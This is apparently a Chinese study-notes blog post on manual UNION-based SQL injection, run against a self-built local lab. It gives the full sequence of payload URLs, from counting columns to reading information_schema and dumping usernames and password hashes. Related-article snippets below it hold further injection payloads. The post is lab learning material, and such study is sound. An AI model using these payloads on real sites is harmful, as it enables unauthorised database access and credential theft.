SQL注入中的union注入

最新推荐文章于 2023-07-11 16:00:52 发布
最新推荐文章于 2023-07-11 16:00:52 发布
阅读量814 收藏 2
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43326436/article/details/105880941
版权

环境自己搭的
union联合,合并,将多条查询语句结果合并成一个结果,union注入攻击是手工测试
1.首先要判断是否存在注入点
2.通过order by 1~99 查询字段
首先应该用查询出字段
1. http://127.0.0.1/web/sql/union.php?id=1%20order%20by%201 (注:%20表示空格,)
我这里从1试到了7
到7的时候报错,也就会是说有6个字段
2. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,2,3,4,5,6
我的回显是2和4,也就是说2和4有搞头
接下来,就是爆数据库名
3. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,database(),3,database(),5,6
回显是两个test
也就是说是test就是数据库的名字
接下来爆表名
只用第四个数据库了,因为名字一样
4. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,2,3,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27test%27),5,6
就是当表名是test的时候,查询表名。
我的回显是person,users,xss
所以继续查询users
继续在表中爆字段
5. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,2,3,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27test%27%20and%20table_name=%27users%27),5,6
爆出字段 id,username,password,address,email,ip
开始查询数据
6. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,2,3,(select%20group_concat(username,password)%20from%20users),5,60
得出:zhangsanahangsandemima,lisilisidemima,test098f6bcd4621d373cade4e832627b4f6
成功
得到账户密码

小学生的学习笔记
关注
专栏目录
sql注入union联合注入
kingdring的博客
11-14 1万+
ps:21号祥云杯,为了避免连到都签不上,临时抱一波佛脚。 声明1:本文章使用的数据皆为官网公示,为保护信息已做打码 声明2:此系列文章仅用于CTF学习及信息安全防御技术,建议读者应用之前在 本地 搭建数据库或靶场等实践环境,在公网使用相关技术前请通读 《网络安全法》 union联合注入 上一篇大致说了sql注入的一些基本原理,这一篇说一说union的相关内容 联合查询 啥是联合查询 select a from b union select c from d where e; 大致就是这样 显然union
SQL注入union联合注入的详解
最新发布
m0_57836225的博客
07-16 259
当应用程序在构建 SQL 查询时,将用户输入未经充分验证和清理就直接拼接到查询语句,如果原始查询语句预期返回一个结果集,而攻击者通过构造恶意的输入,利用 UNION 操作符添加额外的查询部分,就能够将其他原本不应出现在当前查询的数据合并到结果集,从而达到获取敏感数据或执行未授权操作的目的。2. 确定字段数量:通过尝试不同数量的列,观察服务器的响应,以确定原始查询选择的字段数量,以便在注入UNION 查询提供相同数量的列。// 模拟用户输入,此处存在漏洞。
php union用法,SQL Union用法是什么?
weixin_31455121的博客
03-22 238
sql union用法是什么?sql union用法的总结:UNION 运算符将多个 SELECT 语句的结果组合成一个结果集。(1)使用 UNION 须满足以下条件:A:所有查询必须具有相同的结构(即查询的的列数和列的顺序必须相同)。B:对应列的数据类型可以不同但是必须兼容(所谓的兼容是指两种类型之间可以进行隐式转换,不能进行隐式转换则报错)。也可以用显式转换为相同的数据类型。(当数据类型不...
手工注入
weixin_33881050的博客
03-19 57
http://www.zzzz/community/board_list.asp?code=005&id=13 and 1=2 union all (select top 1 1,2,3,4,name,6,7,null,null,null,null,null,null,null,null,null,null,null,null,null from master.dbo.sysdatabas...
mysql手工注入过waf_Mysql 手工注入【常规 Union 查询篇】
weixin_30921875的博客
02-08 175
文章来源于:lsh4ck's Blog在开始真正的注入技巧之前,我们先来大致回顾下必要的 mysql 数据库基础下面是注入 Mysql 时经常会用到的一些单行函数,熟练使用是灵活注入的前提,尤其是在对抗一些 Waf 的时候字符串连接函数,将多个字符串连接成一个字符串,注意,间只要字符串有一个为空,最后结果也为空 同样是连接多个字符串,但可以在开头指定分隔符,跟 concat()稍微不同,它会自...
mysql 手工sql注入_SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)...
weixin_39993989的博客
01-28 190
0x01开启靶场我们可以看到登录界面0x02我们来寻找一下注入点利用工具啊D我们可以找到注入点0x03可以看到是这样的界面下面我们来进行检测我直接给出语句就不一步一步截图了检测语句:and 1=1 返回正常and 1=2 返回错误order by 4 得到有四个字段数0x04利用联合查询来查询回显位置id=-1%20union%20select%201,2,3,4判断得到可以知道回显在 2 ...
SQL注入的各种类型的检测方式
weixin_30699465的博客
07-26 624
#SQL注入各个类型检测方式 http://127.0.0.1/day6/1.php?id=1 union select 1,name,pass from admin 数字型 数字型不用特意加字符,直接 and1=2检测是否有注入点; http://127.0.0.1/day6/1.php?key=-test' union select 1,name,pass from admin --+ 字...
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
Nginx防止SQL注入攻击的相关配置介绍
09-30
在Nginx防止SQL注入攻击是保护Web应用程序安全的重要环节。SQL注入是黑客利用恶意SQL语句侵入数据库的一种常见方法。以下是一些相关的配置介绍,这些配置可以帮助你阻止可能的SQL注入尝试。 首先,了解基本思路:...
DB2数据库SQL注入手册1
08-08
在本手册,我们将介绍如何在DB2数据库进行SQL注入攻击的检测和防止。同时,我们还将提供一些实用的SQL语句,用于检测和防止SQL注入攻击。 检测SQL注入 在DB2数据库,可以使用以下方法来检测SQL注入: 1. ...
SQL注入技巧之显注与盲注过滤逗号绕过详析
09-09
在传统SQL注入,通常会使用UNION语句来连接两个查询结果,以获取额外的信息。当逗号被过滤时,联合查询的使用会受到限制,因为逗号是UNION语句不可或缺的一部分。为了绕过逗号的过滤,攻击者可以使用join来代替...
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入实战—union注入
qq_40909772的博客
07-12 802
测试网站:自建靶场 http://192.168.57.128:1237/sql/union.php?id=1 测试工具:Burp Suite 1.注入过程。 1.1 访问该地址使用burp抓包,返回的结果如下。 1.2 在URL后添加一个单引号,再次访问,返回的结果与id=1不相同。 1.3 继续修改URL,访问id=1 and 1=1,由于and 1=1为真,所以页面应返回与id=1相同的结果,访问id=1 and 1=2,由于and 1=2为假,所以页面应返回与id=1不同的结果,如下图所示。   由
[极客大挑战 2019]LoveSQL
qq_37301470的博客
11-12 601
万能密码登录成功没有发现flag 判断藏在数据库里 check.php?username=1' or '1'='1&password=123456' or '1'='1 登陆成功返回的密码 7a2d6a8fd56b61a79bba61ee8f5ad02c 直接开始联合注入 check.php?username=1' union select 1,2,3%23&password=1 check.php?username=1' union select 1,2,database()%23&
SQL注入union 联合注入
weixin_53711701的博客
01-16 4808
SQL注入union联合注入
mysql 手工sql注入_手工sql注入简单入门
weixin_35342955的博客
02-01 187
1、判断是否可以注入:数字型:1.1在参数后面加一个引号',如果页面报数字number错误,则一定不是sql注入点;如果报数据库比如mysql、oracle之类的错误,则是一个sql注入点。1.2 在参数后面加上 依次加上 and 1=1 和 and 1=2,如果加上 and 1=1 还能正常显示原来的数据,并且加上 and 1=2时,原来数据不显示或者报错时,则是一个sql注入点字符型:1.3...
sql注入-union注入union函数 联合注入
07-11 7446
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
sql注入详解
m0_67392811的博客
06-12 6064
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没
sql注入union用什么可以替代
07-11
在 SQL 注入,如果 UNION 关键字被防止使用,可以考虑使用以下替代方案: 1. 使用子查询:使用子查询将多个 SELECT 语句合并在一起,例如使用括号将它们括起来。 2. 使用 JOIN 语句:根据数据表之间的关联关系,使用 INNER JOIN、LEFT JOIN 或 RIGHT JOIN 等关键字来联接多个表,以达到合并查询结果的目的。 3. 使用内置函数:根据数据库支持的内置函数,可以尝试使用聚合函数(如 SUM、COUNT、MAX、MIN)或字符串函数(如 CONCAT、SUBSTRING)等来组合多个查询结果。 4. 利用存在的合法查询:如果存在其他合法的查询语句可以返回想要的结果,可以利用这些查询来进行数据提取。 需要注意的是,无论使用何种替代方案,都应该遵循最佳实践来防止 SQL 注入攻击,例如使用参数化查询或预编译语句,并对用户输入进行严格的验证和过滤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值